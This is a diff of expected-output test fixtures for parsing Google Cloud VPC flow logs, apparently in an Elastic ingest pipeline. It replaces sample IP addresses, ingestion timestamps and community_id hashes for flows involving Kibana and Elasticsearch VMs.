@@ -6515,8 +6515,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868651600Z", - "original": "{\"insertId\":\"bnj3cofh3cdkg\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":33064},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391508400Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdkg\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33064},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:44:40.125336665Z", "end": "2019-06-14T03:44:40.243022993Z", @@ -6543,18 +6543,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 165290, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 251 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:88xKud9UZj+uL0CBL+jvBleTFIk=", + "community_id": "1:xlc9p+qqPBlTtvXaxYaz5GAWNls=", "bytes": 165290, "name": "default", "transport": "tcp", @@ -6576,7 +6576,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -6613,8 +6613,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868654800Z", - "original": "{\"insertId\":\"bnj3cofh3cdk7\",\"jsonPayload\":{\"bytes_sent\":\"165290\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33556,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391514300Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdk7\",\"jsonPayload\":{\"bytes_sent\":\"165290\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33556,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:59.565335113Z", @@ -6641,17 +6641,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 53706, "bytes": 1458, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:0BGh5oABRy6JrttDfTSBw1iBDW4=", + "community_id": "1:FnUL58e/2lopFxzyH6NB4ZfRZYg=", "bytes": 1458, "transport": "tcp", "type": "ipv4", @@ -6665,7 +6665,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -6690,8 +6690,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868657900Z", - "original": "{\"insertId\":\"bnj3cofh3cdk9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":53706},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"43\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391519800Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdk9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53706},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"43\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:43:50.703302550Z", "end": "2019-06-14T03:43:50.822333871Z", @@ -6718,17 +6718,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 52260, "bytes": 1464, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:MlFaFjbkXS6KKyiSbXcNDQJbn8U=", + "community_id": "1:jQQ6l4o1MZQiUFoVCT++dIYahM8=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -6742,7 +6742,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, 
@@ -6767,8 +6767,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868661100Z", - "original": "{\"insertId\":\"bnj3cofh3cdkj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":52260},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391525200Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdkj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":52260},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:42:11.063146265Z", "end": "2019-06-14T03:42:11.183868408Z", @@ -6789,9 +6789,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 34090, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -6805,7 +6805,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Tx2SSXIplYZjqzTurpvVWc2USh0=", + "community_id": "1:r0YXIwQbyBtxc4laQWML5QBB+Tw=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -6820,7 +6820,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { 
@@ -6844,8 +6844,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868664300Z", - "original": "{\"insertId\":\"bnj3cofh3cdki\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":34090,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391530600Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdki\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34090,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:46:37.712749588Z", "end": "2019-06-14T03:46:37.827345444Z", @@ -6866,9 +6866,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 34178, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -6882,7 +6882,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:bh7TlqiDrY8ste65CJNAKtfwOT0=", + "community_id": "1:ZAwMkhzg8iPFTne4VZtPZ10WSQw=", "bytes": 1780, "transport": "tcp", "type": "ipv4", @@ -6897,7 +6897,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { 
@@ -6921,8 +6921,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868667300Z", - "original": "{\"insertId\":\"bnj3cofh3cdkd\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":34178,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391536100Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdkd\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34178,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:46:51.237256499Z", "end": "2019-06-14T03:46:51.355687385Z", @@ -6943,9 +6943,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 33064, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -6959,7 +6959,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:aT1tuR31uByuIcuxfCbs1kvMBMA=", + "community_id": "1:1YXDYMIDmqablN3iIS5sgm7U7jU=", "bytes": 1776, "transport": "tcp", "type": "ipv4", @@ -6974,7 +6974,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { 
@@ -6998,8 +6998,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868670400Z", - "original": "{\"insertId\":\"bnj3cofh3cdjw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":33064,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391541500Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdjw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33064,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:44:40.125336665Z", "end": "2019-06-14T03:44:40.243022993Z", @@ -7026,17 +7026,17 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 34906, "bytes": 1461, - "ip": "198.51.100.107", + "ip": "67.43.156.14", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:jbQzsE/elxbdsdcfLH3Z+WY7yoA=", + "community_id": "1:w9XiZoaEVIGVzEG0jduGM1uQWNw=", "bytes": 1461, "transport": "tcp", "type": "ipv4", @@ -7050,7 +7050,7 @@ }, "related": { "ip": [ - "198.51.100.107", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -7075,8 +7075,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868673500Z", - "original": "{\"insertId\":\"bnj3cofh3cdk3\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"198.51.100.107\",\"src_port\":34906},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391547Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdk3\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":34906},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:48:50.642206049Z", "end": "2019-06-14T03:48:50.757255245Z", @@ -7097,9 +7097,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 58216, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -7113,7 +7113,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:5iAZA+PYVbiwpnPFNQCxKlsIp60=", + "community_id": "1:fAWVAPDjem3VSliUyZGusurhkpQ=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -7128,7 +7128,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { 
@@ -7152,8 +7152,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868677300Z", - "original": "{\"insertId\":\"bnj3cofh3cdkb\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":58216,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "ingested": "2021-12-09T13:37:46.391552500Z", + "original": 
"{\"insertId\":\"bnj3cofh3cdkb\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":58216,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:49:36.865198297Z", "end": "2019-06-14T03:49:36.982303071Z", @@ -7174,10 +7174,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + 